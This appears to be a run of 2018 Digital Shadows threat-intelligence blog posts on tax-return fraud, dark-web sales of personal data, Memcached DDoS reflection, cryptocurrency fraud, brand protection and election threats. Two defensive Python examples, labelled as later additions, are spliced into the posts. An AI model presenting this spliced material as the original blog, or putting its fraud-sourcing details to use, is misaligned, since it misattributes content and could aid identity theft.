This year’s IWD theme is “Time is Now: Rural and urban activists transforming women’s lives”. I have long looked up to the many amazing and inspiring activists who tackle these challenges on a daily basis. I also think many others are hesitant to call themselves “activist” for fear of reprisal or challenge and I throw my own hat into that ring – I’ve never thought of myself as an activist, despite leading my university’s chapter of N.O.W., marching in “Take back the night” rallies and turning down opportunities for IT employment that had “females must wear dresses” requirements (yes, this really happened). What I’ve learned over the years is that it is less important about what you call yourself – just as our actions shape our destiny, so too do they describe our aspirations and capabilities. For all my male and female friends and colleagues who are nervous about taking up the title activist or feminist, I challenge you to simply “do”. Call out the derogatory jokes when you hear them, challenge your peers to leave discrimination behind them, and turn an eye to your own unconscious bias.

Lastly, in light of the recent RSA keynote conversation and ongoing challenges around having enough women in the cyber security industry, if I could turn the clock back and tell my younger self anything, it would be to build the technical capability, competency and confidence that goes along with that, but also to be open to taking leaps of faith. It took me a long time to realize I could apply for the next challenge or next role without being 110% qualified.

As for that interview question?  My response: “I hope they can handle working with me!” I’m happy to report I got the job.


Interested in reading more on Women in Security? Read my colleague’s blog post, Women in Security: Where We Are And Where We Need To Go.

It’s Accrual World: Tax Return Fraud in 2018
Wed, 07 Mar 2018 17:15:17 +0000

With just over a month until Tax Deadline Day, individuals are scrambling to get their tax returns submitted. This is a proven time of year for cybercrime, and 2018 has been no exception. The Internal Revenue Service (IRS) has already outlined new scams targeting consumers this year. Criminals have once again used tax themes as lures to spread malware, as was the case with the Rapid Ransomware campaign.

Tax Fraud in 2018

Tax fraud endures despite countermeasures and increased awareness of the threat. This is largely due to the extent of personally identifiable information (PII) available online. Social Security Numbers (SSNs) are widely advertised and can be purchased for as little as $1; Figure 1 shows a criminal site selling 4,210,341 SSNs, which also include associated names, physical addresses and dates of birth.

Figure 1: Social Security Numbers for sale on cvv[.]me


The Equifax breach in 2017 led to the theft of PII belonging to at least 145 million individuals. Recent revelations suggest that attackers may have also stolen tax identification numbers and additional driver’s license and credit card details. While it is not clear whether the breach was conducted by cybercriminals or a nation-state, this data – should it eventually find its way into the criminal market – would provide a wealth of opportunities for tax fraudsters.

Acquiring Tax Information

Tax information – such as W2, 1040 and 1099 forms, as well as company accounts – is valuable data for cybercriminals. This information can be obtained through network intrusions, phishing, and Business Email Compromise (BEC). The latter technique typically works by impersonating an employee within the organization; in the tax version of the scam, the victim is asked to send tax documents instead of wiring funds. With this data, criminals can then commit fraud or resell the data.

Attackers can also acquire this information through scam pages. Tax filing companies are particular targets of these phishing attempts. A recent example of this is turbotax-myintuit[.]com, an imitation of the legitimate turbotax[.]intuit[.]com. While the site is not yet hosting content, it has the potential to be used in phishing campaigns.

At this time of year, fraudsters take to forums requesting help with getting tax information for their scams; meanwhile, more technically capable actors look to profit by providing their services and expertise. In Figure 2, a criminal forum user asks for help in obtaining the relevant documents needed to submit their fraudulent tax return, while in Figure 3 a seller openly advertises their “Hacking Services”, which include the ability to procure W2 forms.

Figure 2: User on Hack Forums looking to buy W2 and 1040 tax forms (screenshot taken on February 27, 2018)


Figure 3: Seller on Offensive Community forum advertising hacking services


Purchasing Information Online

For as little as $40-50, criminals can bypass these procedures altogether and buy these documents on criminal forums and marketplaces. These include stolen, pre-filled and forged forms (Figure 4), as well as specialist guides for conducting tax return fraud (Figure 5).

Figure 4: Forged W2 form advertised for $52 on Dream Market


Figure 5: Tax return fraud cashout guide for sale on Wall Street marketplace


Social Security Numbers are ubiquitous across dark and deep web marketplaces and criminal shops. In some instances, as seen in Figures 6 and 7, vendors will offer packages that have a range of data on individuals. This can be partial PII or “fullz”, a term that means a combination of financial and personal information. The latter is more valuable for threat actors, but partial PII can also be used to commit a range of identity frauds, including falsified tax returns.

Figure 6: W2 and SSN information for sale on Wall Street, a darkweb marketplace


Figure 7: “Full profiles” advertised on Dream Market, a dark web marketplace. The posting includes W2 forms, pay-stubs and Social Security Numbers


Of course, there are security measures that make tax fraud more difficult for criminals, such as the IP PIN that is issued to many taxpayers by the IRS. Despite the IRS being vulnerable to compromise in previous years, the system is now more resilient to exposing that information to fraudsters (there is no longer a web interface for forgotten PINs with easy-to-answer questions, for example).

Capitalizing on Dediks

Fraudsters can also target customer accounts at tax filing companies without the need for phishing or scam pages. In Figure 8, one forum user seeks partners who control computers with tax preparation software installed. The term “Dedik” is an abbreviation of “dedicated”, used to describe a computer under the remote control of a hacker. With control of a user’s computer that runs this software, a malicious actor can capture keystrokes and ultimately gain access to the user’s accounts.

Figure 8: Actor on a Russian-speaking forum seeking individuals with access to computers that have tax preparation software present (screenshot taken on February 27, 2018)


Staying Safe Online

With actors looking to monetize the vast amount of PII available online during tax season, consumers, organizations and tax filing companies should be extra-vigilant about fraudulent activity. Here are some tips:

  1. Consumers should submit an Identity Theft Affidavit if they have been the victim of identity theft.
  2. The IRS provides some great resources for understanding the latest techniques used by attackers, which you can access here or by following @irstaxpros on Twitter.
  3. Organizations should consider that BEC can be used to obtain information as well as to wire funds. Update your security awareness training content to include the BEC scenario. This should be included in new hire training, but you should also conduct ad hoc training for this scenario now.
  4. Tax filing companies should monitor for spoofed domains. DNS Twist is a good, free resource to do so.
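As an added example of the spoofed-domain monitoring recommended in item 4 (this is not code from the post or from Digital Shadows, and it is not dnstwist itself), the Python below fans out typosquat permutations of the legitimate turbotax.intuit.com and flags observed domains, such as the turbotax-myintuit[.]com from this post, that reuse the brand's name tokens without being brand-controlled; every other observed domain in it is constructed.

```python
"""Lookalike-domain triage for a tax-filing brand.

Added example written for this post; it is not Digital Shadows' code and
not dnstwist. It generates common typosquat permutations of a legitimate
domain and flags observed domains that reuse the brand's name tokens but
are not under the brand's control. The legitimate domains are the ones
named in the post; every other domain here is constructed.
"""

# Domains the brand controls (from the post: turbotax[.]intuit[.]com).
LEGIT_DOMAINS = {"turbotax.intuit.com", "intuit.com"}
# Name tokens that should trigger review when found in a foreign domain.
BRAND_TOKENS = ("turbotax", "intuit")
# TLDs to fan out across; extend to whatever your registrar sees abused.
COMMON_TLDS = ("com", "net", "org", "co", "info", "tax")


def refang(domain: str) -> str:
    """Turn defanged notation such as example[.]com back into a hostname."""
    return domain.replace("[.]", ".").strip().lower().strip(".")


def registrable(domain: str) -> str:
    """Naive eTLD+1 (last two labels); fine for .com-style brands. Use the
    public suffix list in production to handle co.uk-style suffixes."""
    return ".".join(refang(domain).split(".")[-2:])


def permutations(domain: str) -> set:
    """Typosquat permutations defenders typically watch for: subdomain
    collapse, hyphenation, character omission, repetition, transposition
    and TLD swaps."""
    labels = refang(domain).split(".")
    name, tld = ".".join(labels[:-1]), labels[-1]
    flat = name.replace(".", "")       # turbotaxintuit
    hyphen = name.replace(".", "-")    # turbotax-intuit
    out = set()
    for base in {flat, hyphen}:
        for t in COMMON_TLDS:
            out.add(f"{base}.{t}")
    for i in range(len(flat)):
        out.add(f"{flat[:i]}{flat[i + 1:]}.{tld}")        # omission
        out.add(f"{flat[:i]}{flat[i]}{flat[i:]}.{tld}")   # repetition
        if i + 1 < len(flat):
            swapped = flat[:i] + flat[i + 1] + flat[i] + flat[i + 2:]
            out.add(f"{swapped}.{tld}")                   # transposition
    out.discard(refang(domain))
    return out


FUZZ = set()
for _legit in LEGIT_DOMAINS:
    FUZZ |= permutations(_legit)
LEGIT_REGISTRABLE = {registrable(d) for d in LEGIT_DOMAINS}


def classify(candidate: str) -> tuple:
    """Return (verdict, reason) for one observed domain."""
    host = refang(candidate)
    if registrable(host) in LEGIT_REGISTRABLE:
        return ("legitimate", "registrable domain is brand-controlled")
    if host in FUZZ:
        return ("lookalike", "typosquat permutation of a legitimate domain")
    squashed = host.replace("-", "").replace(".", "")
    hits = [t for t in BRAND_TOKENS if t in squashed]
    if hits:
        # Token matching is a heuristic ('intuition-x.com' also contains
        # 'intuit'), so these rows go to an analyst, not to auto-takedown.
        return ("lookalike", "brand token(s) in foreign domain: " + ", ".join(hits))
    return ("unrelated", "")


def triage(candidates) -> list:
    """Classify a batch and keep only the rows worth a human look."""
    rows = [(refang(c),) + classify(c) for c in candidates]
    return [r for r in rows if r[1] == "lookalike"]


# Constructed sample of newly observed domains (e.g. from a certificate
# transparency or new-registration feed); the first is the one in the post.
OBSERVED = [
    "turbotax-myintuit[.]com",
    "turbotax[.]intuit[.]com",
    "turbotaxintuit.com",
    "trubotaxintuit.com",
    "intuit.com.login-verify.example",
    "example.com",
]

if __name__ == "__main__":
    for host, verdict, reason in triage(OBSERVED):
        print(f"{verdict:9} {host:35} {reason}")
```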

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.05.2018
Mon, 05 Mar 2018 16:23:17 +0000

On this week’s Shadow Talk podcast, the Research Team cover CVE-2018-4878 being used in a spam campaign, the HTTPS certificate chaos between Trustico and DigiCert, more ransomware reporting on the SamSam and DataKeeper variants, and the threat of large-scale distributed denial of service (DDoS) attacks using Memcached servers.

Spam enables Flash vulnerability exploit

An Adobe Flash vulnerability tracked as CVE-2018-4878 is being exploited through a spam email campaign. Lure emails contained a shortened link that, if clicked, led to a web domain hosting weaponized Microsoft Word documents. If the documents were opened, the attack attempted to exploit the vulnerability, enabling remote code execution. CVE-2018-4878 was previously exploited as a zero-day vulnerability in targeted espionage; the spam campaign shows its rapid uptake by other threat actors. Proof of concept exploit code was released publicly, meaning CVE-2018-4878 will likely continue to be targeted by operations using multiple entry vectors, despite a patch being available.


Thousands of website certificates revoked after private key exposure

23,000 Symantec-issued HTTPS website certificates resold by Trustico will be revoked after the associated private keys were exposed via email. This may result in website service interruptions unless owners quickly replace their certificates. Affected customers were notified, with both DigiCert – the entity responsible for revoking the certificates – and Trustico offering free replacement certificates. Although both DigiCert and Trustico are likely to suffer some reputational damage due to conflicting reporting and their public dispute, this is unlikely to impact trust in the certification system.


Update on SamSam ransomware attack

The Colorado Department of Transportation, in the United States, took 2,000-plus staff computers offline after an attack by ransomware “SamSam”. No crucial systems were reportedly affected, and only computers running Windows operating systems were disrupted. The attack vector is not known, but SamSam usually targets vulnerable software applications or servers. The “Gold Lowell” threat group has previously used SamSam and accrued a significant profit from attacks.


New DataKeeper ransomware variant detected

The “DataKeeper” ransomware-as-a-service (RaaS) variant is distinct for its ability to conduct lateral movement. At the time of publication, there had been no transactions into the Bitcoin address associated with this RaaS, indicating that any attempted extortions using the address were ineffective. However, given its accessibility, profit share and capacity for lateral movement, this ransomware will likely be adopted by a variety of actors.


Memcached servers used for DDoS reflection attacks

There is a new DDoS reflection attack method that abuses internet-facing Memcached servers. Memcached is a memory caching system that, by default, listens on UDP port 11211. More than 90,000 of these servers were discoverable via the Shodan search engine as of 28 February. The code repository site GitHub was targeted by this method, with the peak attack volume recorded at 1.35 terabits per second. Blocking or filtering this traffic, or modifying the Memcached configuration to listen only on localhost, is recommended.
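To show what "listen only on localhost" means in practice, the following added Python audit (not code from the podcast or from the Memcached project) parses a memcached.conf in the one-option-per-line style and reports whether UDP is enabled on a non-loopback address; both configuration texts are constructed, with the weak one beside the hardened one.

```python
"""Audit a Memcached configuration for DDoS-reflection exposure.

Added example for this item; it is not Digital Shadows' code and not part
of the Memcached project. It parses the one-option-per-line format used by
Debian/Ubuntu's /etc/memcached.conf and reports whether the daemon would
answer UDP queries on an internet-facing address. Both configuration texts
below are constructed for illustration.
"""
import shlex

# Defaults as described in the item above: UDP 11211 on all interfaces.
# (Memcached 1.5.6 and later ship with UDP disabled unless -U is given.)
DEFAULT_UDP_PORT = 11211
DEFAULT_LISTEN = "0.0.0.0"

WEAK_CONF = """\
# constructed: a typical exposed deployment
-d
-m 64
-p 11211
-U 11211
-l 0.0.0.0
"""

HARDENED_CONF = """\
# constructed: UDP disabled, TCP bound to loopback only
-d
-m 64
-p 11211
-U 0
-l 127.0.0.1
"""


def parse_memcached_conf(text: str) -> dict:
    """Map each option flag to the list of values given for it.
    Comments (#) and blank lines are ignored; a flag may repeat."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = shlex.split(line)
        opts.setdefault(parts[0], []).extend(parts[1:])
    return opts


def _is_loopback(addr: str) -> bool:
    """True for 127.x, ::1 and localhost; -l accepts 'addr' or 'addr:port'
    (bracketed IPv6 with a port is not handled here)."""
    a = addr.strip()
    if a.count(":") == 1:          # IPv4 with an explicit port
        a = a.split(":")[0]
    return a == "localhost" or a == "::1" or a.startswith("127.")


def audit(opts: dict) -> dict:
    """Decide whether this configuration can be abused as a UDP reflector:
    UDP must be enabled AND at least one bind address must be non-loopback."""
    udp_port = int(opts.get("-U", [str(DEFAULT_UDP_PORT)])[-1])
    listens = opts.get("-l", [DEFAULT_LISTEN])          # -l may be comma-separated
    addrs = [a.strip() for value in listens for a in value.split(",")]
    public_binds = [a for a in addrs if not _is_loopback(a)]
    reflectable = udp_port != 0 and bool(public_binds)

    recommendations = []
    if udp_port != 0:
        recommendations.append("-U 0  # disable the UDP listener entirely")
    if public_binds:
        recommendations.append("-l 127.0.0.1  # or a private interface only, plus a host firewall rule")
    return {
        "udp_port": udp_port,
        "bind_addresses": addrs,
        "internet_reflectable": reflectable,
        "recommendations": recommendations,
    }


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(parse_memcached_conf(conf)))
```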



The New Frontier: Forecasting Cryptocurrency Fraud
Thu, 01 Mar 2018 16:34:51 +0000

Not a week goes by without a new case of cryptocurrency fraud making headlines. The most recent example concerned the BitGrail exchange, which suffered an attack that resulted in the loss of 17 million Nano Tokens ($170 million). Although BitGrail responded by announcing new security measures – highlighting the need for better security practices by both companies and individuals handling cryptocurrencies – this incident has also been marred by a disagreement between Nano Token and BitGrail over liability. This has sharpened calls for strict regulation of cryptocurrencies and their methods of exchange.

Regulation could have a significant impact on the cryptocurrency space, but we need to remember that even with long-established regulatory and law enforcement measures, traditional currencies are still targeted by fraudsters, so we shouldn’t expect cryptocurrencies to be any different.

What we can be sure of is that cybercriminals will continue to find new ways of making money as long as there are enough suitable targets available and the financial reward justifies their time and effort. To better model the future of cryptocurrency fraud, it helps to outline the main drivers and assumptions behind this phenomenon, which we have achieved by using the Cone of Plausibility analytical technique (see Figure 1 below). Our recent paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud, provides an analysis of these drivers. These include:

    1. Accessibility – Advances in technology and the wide availability of tools facilitate this type of fraud. Products such as Crypto Jacker lower the barrier to entry, as explored in our previous blog.

    2. Anonymity – Cryptocurrencies and blockchain technology offer a level of anonymity that, while beneficial in many respects, also emboldens fraudsters. Currencies like Monero have better privacy features relative to their older cryptocurrency counterparts, which has in part made it increasingly popular on criminal markets and in money laundering operations. The funds accrued during the June 2017 WannaCry attack, for example, were converted from Bitcoin to Monero, likely because this move would make it easier to anonymously convert into fiat currency.

    3. Popularity and hype – The boom in cryptocurrency investment and development in recent years is one of the strongest drivers for this type of fraud. Criminals will always follow the money, looking to take advantage of whatever is most popular and most lucrative. In the mid-nineteenth century, the promise of gold inspired hundreds of thousands of people to make the journey to California in the hope of striking it rich. The cryptocurrency boom can be seen as a new Gold Rush, with countless individuals rushing to get a piece of the action, heartened by the astronomical rise of Bitcoin, which reached $19,343 in mid-December 2017.

    4. Reputation – Cryptocurrencies were once seen as an esoteric countercultural development favoured by libertarians or criminals; their integration into existing payment systems has given them greater legitimacy. Although not widespread, the roll-out of cryptocurrency-backed prepaid cards and plans for private European banks to provide cryptocurrency services increase the reputation of cryptocurrencies – in turn making them a more attractive prospect to investors. If their reputation increases, they will become more popular, increasing the number of targets for fraudsters.

    5. Opportunity – The sheer number of new altcoins, exchanges and coin offerings means that fraudsters have a wealth of potential targets. With over 1,442 cryptocurrencies in circulation, and new alternative coins – “altcoins” – emerging every week, the opportunities for cybercriminals to defraud cryptocurrency enthusiasts only increase. Our previous blog focused on the ways criminals were exploiting the interest in Initial Coin Offerings (ICOs) – a way of crowdfunding cryptocurrencies and platforms – through exit scams, spoof ICOs and price manipulation.

    6. Regulation – The success of price manipulation and scam ICOs is aided by a lack of regulation and oversight. In a regulated market such fraud would be illegal, and the threat of law enforcement action would probably deter many, although not all, criminals. Moreover, exchanges and ICO projects would be under more pressure to improve their security practices, as they would face serious consequences for facilitating a breach. The BitGrail case, discussed above, is a clear example where a lack of clarity over who bears responsibility for the attack has so far prevented customers from reclaiming the value of their tokens.

       Despite more concerted efforts of late by U.S. authorities – the Securities and Exchange Commission recently filed charges against PlexCorps, which was accused of defrauding investors through a scam ICO – the future of cryptocurrency regulation is also uncertain and should not be seen as a panacea for fraud. Criminals will continue to take risks regardless of the potential legal ramifications of being caught. In addition, regulatory implementation will likely be uneven, with some countries such as China and South Korea choosing to ban ICOs completely. While stricter regulation could have a beneficial effect in reducing fraud, it may also deter would-be investors and drive down the value of cryptocurrencies.

    7. Security – As long as organizations and individuals fail to improve their security measures, opportunities for fraud will continue to exist. Weak password practices enable account takeovers, misconfigured cloud services facilitate cryptojacking, and failure to patch and update effectively means attackers can continue to exploit known vulnerabilities to deliver cryptomining malware.



    Figure 1: Cone of Plausibility used to forecast future of cryptocurrencies

    One of the greatest benefits of this forecasting approach is that it clearly outlines the drivers behind the rise in cryptocurrency fraud, which in turn lets us home in on the factors that we, as organizations and individuals, can influence. While some changes will be harder and more time-consuming to implement, there are several measures that organizations, consumers and exchanges can take immediately to mitigate cryptocurrency fraud risks. These include:


    • Requiring authentication on cloud services like AWS so fraudsters cannot hijack your processing power to mine cryptocurrency
    • Replacing factory-default credentials with unique, strong passwords to prevent Internet of Things devices from being incorporated into botnets
    • Enforcing strong password security rules across your organization, including enabling multi-factor authentication (MFA)
    • Patching known vulnerabilities being used to deliver cryptominers. Vulnerabilities in Apache Struts (CVE-2017-5638) and DotNetNuke (CVE-2017-9822) servers have been used to download Monero miners. These miners have also been delivered by exploiting patched vulnerabilities in the popular Apache CouchDB open source database (CVE-2017-12635 and CVE-2017-12636)
    • Having a reputable adblocker in place; the NoCoin browser extension was developed specifically to block coin miners like Coinhive
    • Checking phishing databases and more specialist cryptocurrency fraud sites, such as the Ethereum Scam Database, before using any sites that you are unfamiliar with


    Despite their volatility, high valuations, looming regulation measures and the projected adoption of cryptocurrency in both online and physical transactions, cryptocurrency fraud will not go away any time soon. However, greater education about cryptocurrencies and the risks associated with them for consumers and organizations can go a long way to fighting this trend. Digital Shadows will continue to watch this evolving space, providing research and advice that can help users navigate the Wild West that is the cryptocurrency world.

    To learn about other tactics, including account takeover and crypto jacking, download a copy of our research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.

    Protecting Your Brand: Return on Investment
    Tue, 27 Feb 2018 16:29:23 +0000

    Last week I was joined by Brett Millar, Director of Global Brand Protection for Fitbit, for a webinar on “Protecting Brands from Digital Risks and the Dark Web”. It was great to hear how Brett works with different business functions to address different risks to the Fitbit brand. Most of all, I loved hearing about the different ways in which Brand Managers can demonstrate a return on investment (ROI).


    Brand Protection

    For organizations looking to safeguard their brands online, there are many online sources where brand abuse occurs. In the webinar I spoke about the threats to brands that exist on the dark web, specifically account takeover and counterfeit goods. Dark web marketplaces, such as Dream Market shown below, have whole sections dedicated to the sale of counterfeit goods. Of course, there is a lot more to brand protection than dark web activity. Organizations need to be monitoring a wide range of sources to adequately protect their brands online. (Check out a blog from our CMO, Dan Lowden, on some specific instances of brand exposure that we’ve seen involving spoof domains, fake mobile applications, and fake social media profiles.)


    Figure 1: A dedicated counterfeit category on the Dream Market, with over 2,800 goods for sale


    Affecting the Bottom Line

    ROI (Return on Investment) is a common term in security, but effectively demonstrating it is difficult. One reason is that ROI is a calculation, usually expressed numerically or as a percentage. The impact of a security investment, however, does not always lend itself to quantifiable metrics. It is always trickier to show how events that have not happened, like cyber attacks that have been averted, affect a company’s net earnings or bottom line.

    The concept of ROI is just as critical for brand protection; Brand Managers need to be able to show they are impacting the bottom line. The good news is that the result of your brand protection strategy is measurable, and there are three main ways to do just that.

    1. Direct revenue return. This is the most clear-cut way of demonstrating ROI. Investigations launched by an organization’s fraud team in counterfeit sites can lead to proceeds flowing back into the company. This typically occurs through settlements, judgement amounts, and restitution amounts. This approach is pretty easy to quantify.
    2. Loss prevention. This is a different side of the same coin as direct revenue return. Stopping an activity that was costing the company $X million per year prevents this loss from reoccurring.
    3. Indirect revenue. If an increase in revenue for a particular product coincides with an increased effort to remove counterfeits of that product on gray and black markets, it can be inferred that there may have been some sort of causation. This is harder to quantify but it can, nonetheless, be valuable.

    These can be supplemented with activity metrics, such as the number of:

    • Cease and Desist letters sent
    • Audits performed
    • Sites taken down
    • Custom site seizures

    With so many areas of security to focus on, demonstrating a return on investment is a constant challenge. However, the intersection of brand management and security offers a real opportunity to demonstrate the economic value of protecting your brand online.

    Watch the webinar on “Protecting Brands from Digital Risks and the Dark Web” to find out more about other types of brand exposure and ways organizations can manage this risk.

    Shadow Talk Update – 02.26.2018
    Mon, 26 Feb 2018 15:51:21 +0000

    In this week’s podcast, the Digital Shadows Research Team discuss attacks against banks using the SWIFT network, business email compromise (BEC) threats, the state of ransomware, as well as new activity by thedarkoverlord and APT-37.



    Two new thefts using SWIFT network confirmed

    Over the past week, an unidentified Russian bank and India’s City Union Bank confirmed that recent fraudulent SWIFT banking transfer requests had been submitted, attempting to steal $8 million. Specifics of malware deployment, and the perpetrators’ tactics, techniques and procedures (TTPs), are among the many unknown details. Previous SWIFT attacks have been attributed to “Lazarus Group”, although several financially motivated actors have likely made similar theft attempts. Targeting this transfer system remains profitable, and further theft attempts are likely.


    Business email compromise campaign targets Fortune 500 companies

    Fortune 500 companies – ranked among the highest-revenue companies in the United States – have been subject to an ongoing BEC campaign. Targets operated in the retail, healthcare, financial and professional services sectors. Campaign operators have allegedly stolen “millions of dollars” using spearphishing as well as advanced social engineering techniques; no malware was involved.


    Extortion actor thedarkoverlord publicizes new targets

    The threat actor thedarkoverlord has returned after a three-month hiatus. Recent Twitter activity suggests targeting of a US public school union, a US law firm, and unspecified Hollywood companies. Thedarkoverlord has previously conducted a number of extortion campaigns, largely against the United States healthcare sector. Digital Shadows cannot establish the veracity of these new claims, but it is likely that thedarkoverlord is attempting to gain new publicity by threatening high-profile targets.


    Ransomware remains a threat to organizations in all industries

    The “Saturn” ransomware-as-a-service (RaaS) variant has been active in February. Saturn RaaS does not require a sign-up fee; instead, the developers request 30% of the extortion fees generated by each successful infection. In other ransomware news, the Colorado Department of Transportation (CDOT) was affected by a SamSam ransomware infection on 21 February 2018. This infection reportedly caused disruption to 2,000 computers owned by CDOT; however, CDOT stated it will not pay the ransom and is restoring from system backups.


    North Korea-linked espionage group APT-37 continues to evolve

    Cyber security company FireEye reported the continued activity and evolution of “APT-37” (aka Reaper), an allegedly North Korea-linked threat group motivated by information theft and espionage. FireEye’s research also linked APT-37 activity to that reported for other threat actors, including “Group 123” and “ScarCruft”, although exact details were unclear. APT-37 has mainly targeted the technology and healthcare sectors in South Korea, but has also targeted Japan, Vietnam and the Middle East. APT-37 will likely continue its information-gathering campaigns for the short- to mid-term future (one to six months), and more information about the group may arise during that time.


    Threats to the Upcoming Italian Elections
    Thu, 22 Feb 2018 17:08:26 +0000

    On 5 March Italian citizens will go to the polls to vote in a general election, following the dissolution of the Italian Parliament by President Sergio Mattarella on 28 December 2017. Italy has been led by a caretaker government under the leadership of Democratic Party (PD) foreign minister Paolo Gentiloni since the resignation of former Prime Minister Matteo Renzi. Renzi stepped down following the loss of a referendum on constitutional reforms in December 2016.

    This March will see the use of a new electoral system, one designed to favor coalitions by requiring the governing party to gain over 40% of the vote, thus making it harder for a single party to win a majority in Italy’s notoriously divided parliament. No party has yet polled above 40%, with a centre-right alliance formed by Silvio Berlusconi currently polling at approximately 35%.

    Under the growing cloud cast by reports of network intrusions against political parties during the 2016 United States presidential election, as well as claims of a Kremlin-backed influence campaign in favour of the Front National in the French elections, political events are coming under more and more scrutiny for nefarious activity. In this blog we will assess the confirmed examples of cyber attacks that we have observed, and look back at activity seen during previous elections to forecast the type of activity we can expect. This includes hacktivism, network intrusions, data leaks and disinformation.


    1. Hacktivism

    Hacktivist actors are most often motivated by public attention, either for themselves, or the issues they claim to represent. Hacktivist attacks generally take the form of denial of service (DoS) attempts, website defacements, and the curation of open source data to appear like a data leak. The Anonymous collective has had an ongoing #OpItaly campaign since January 2017, when Italian law enforcement arrested two individuals charged with cyber espionage against politicians, public institutions, and commercial entities. The activities of the group have not yet targeted political parties, but may use the publicity surrounding the elections as a platform to gain public attention.

    Further factions of the collective, such as the Italian hacktivist group AnonPlus, have specifically targeted the elections, releasing personally identifiable information of regional PD members and defacing PD websites. However, their impact so far has been limited, and is unlikely to have any lasting effect on the elections themselves: the ‘leaked’ data was already available in open sources, and their website defacements did not cause any persistent disruption.

    More sophisticated threat actors have targeted the Rousseau platform used by far-right party Movimento5Stelle (M5S). #Hack5Stelle is a campaign focused on leaking names, passwords, and datasets associated with the platform, driven by both financial and political motives.


    Figure 1: Twitter account offering allegedly hacked Movimento5Stelle database for sale


    Figure 2: Landing page for the Rousseau platform


    2. Network Intrusions

    Actors may seek to target political parties or government organizations in order to exfiltrate sensitive data for use in political campaigns. Given alleged Russian involvement in the network intrusions against the Democratic Party in the US, and the signing of a collaboration agreement between far-right party Lega Nord and Vladimir Putin’s United Russia party, it is plausible that a similar threat may be present during the Italian elections. Fraught current relations between Russia, NATO, and the EU, combined with the Lega Nord’s anti-EU platform, mean that the Italian elections are likely to present a target for Russian espionage campaigns. Furthermore, large financial institutions may be targeted given the focus on the economy and currency in this year’s election.

    Social engineering and spear phishing remain the most successful attack vectors for network intrusions, and this is unlikely to change for the Italian elections.


    3. Data leaks

    While a number of activist groups have leaked open source databases of local political parties, a more sophisticated threat actor could release sensitive or confidential information in order to bias political opinion. Such information can be obtained in a number of ways and be used by a variety of threat actors, including both ideologically motivated individuals and nation state groups. Phishing and social engineering attempts, network intrusions, and document theft from insiders are all ways in which threat actors may seek to obtain such data. We detected no data leak campaigns relating to the Italian elections at the time of writing.


    4. Disinformation

    False media reporting, also known as the fake news phenomenon, is increasingly used by threat actors to sway or alter public political opinion. Such activity uses a wide variety of platforms, including legitimate or spoofed accounts on social media platforms such as Facebook and Twitter, and interweaves both legitimate and exaggerated or false reporting. During the French elections, we observed a claim of plagiarism when a spoofed website of the legitimate Belgian newspaper Le Soir published articles alleging that Saudi Arabia was financing Emmanuel Macron’s campaign. We outlined the easy availability of such tools in our previous report, The Business of Disinformation.

    Although no legitimate newspapers have claimed plagiarism during the Italian elections, a number of Twitter accounts related to Wikileaks Italy (@Wikileaks_Ita – to which the main Wikileaks account has denied any official association), have been tweeting news relating to the current Eni bribery investigations. The account uses a combination of real news reports and rumours to allege former Prime Minister Renzi’s involvement with criminal activities. Although Renzi is not standing in this election, such an allegation has a reputational impact for the PD, Renzi’s party.


    Figure 3: Twitter account impersonating WikiLeaks used to spread articles on corruption investigations


    Furthermore, fake accounts on Twitter and Facebook used in the referendum campaign in 2016 have been reanimated in support of Matteo Salvini, leader of the Lega Nord. A number of automated accounts have been linked to the party’s official Twitter feed, @LegaSalvini. Although these bots have not been used to publicize fake news, they have been used to bias or promote political opinions by artificially inflating the support and publicity accorded to Salvini.



    Figure 4: Examples of Twitter bots all used to publish the same posts in support of Matteo Salvini


    E allora?

    Despite ongoing concern surrounding elections, it is unlikely that outside threat actors will seek to interfere in an already chaotic process. Unlike the 2017 elections in France and Germany, the Italian electoral process is far less transparent, and the proliferation of smaller parties makes it difficult to say where an influence campaign could add value. It is similarly difficult to see which party an external threat actor would seek to favour: none is likely to gain a clear lead, and all have made varying and conflicting public statements about the parties with which they would be willing to cooperate.

    The most likely threat comes from domestic hacktivist campaigns: groups may conduct DDoS attacks against election infrastructure or deface official websites, hindering the voting process.

    While the scenarios above remain unclear, organizations can help protect themselves against many of the techniques and threats described above. Mitigation measures include:

    • Providing adequate training for staff regarding the threat from spear phishing and social engineering attacks. This will mitigate against the most likely, but not the only, attack vectors for network intrusion and public data leaks.
    • Properly securing public facing applications and tracking activist campaigns.
    • Enforcing strong password security practices to reduce the likelihood of account takeovers.
    • Remaining skeptical about reported statistics and stories.

    Subscribe to our weekly newsletter to get the threat intelligence and research by Digital Shadows.

    Prioritize to Avoid Security Nihilism Tue, 20 Feb 2018 15:41:56 +0000 In many situations associated with cyber security, in particular defending an organization, it is easy to get overwhelmed with not only the sheer number of issues but also the complexity of the interconnections between them. Technical issues are inextricably linked with social, cultural and political issues. Confronted with this sea of obstacles, it’s easy to succumb to security nihilism: “nothing is ever good enough”, “offense always wins” or “security is a losing battle”. As a defender, it is crushing to see how even an average Red Team can rip apart your defences, another successful engagement for Team Red as your passwords tumble helplessly out of the Domain Controller!

    It’s a truism, if not a platitude, that “perfect is the enemy of good”, but I believe that this phrase takes on a new meaning in the world of cyber security. The answer to security nihilism is the art and science of prioritization. Since defenders cannot protect everything to an equal standard, trade-offs have to be made. Difficult decisions must be taken. But where to start? I would argue that the best place to start is with the reality of protecting your organization. By which I mean, a pragmatic focus on:

    1. The critical assets that your organization has
    2. The credible threats to those assets

    Threat modelling exercises are useful heuristics for roughly working out the critical assets and the credible threats. An organization that handles payment card data will have a different set of assets and threats from one that handles sensitive government data, which in turn will differ from one that regularly stores Protected Health Information (PHI). An organization’s security posture should be appropriate for the types of threats it realistically faces.

    In order for these threat modeling exercises, which are often table-top exercises, to have meaning, they must be grounded in reality. Not all threats that organizations face wield NSA-grade 0days. Not all organizations are routinely attacked by APT groups. But understanding how attackers you are facing actually operate is essential. As The Grugq is fond of saying, “increase attacker costs!”. As defenders, we need to understand what tasks are costly for attackers and how to make those tasks even more expensive.

    Let’s see how standard TTPs (tactics, techniques, and procedures) used by a wide-variety of different threat actors can be made more expensive. We’ll start with a phishing campaign:



    Outside in, network-based attacks are also widely-used:



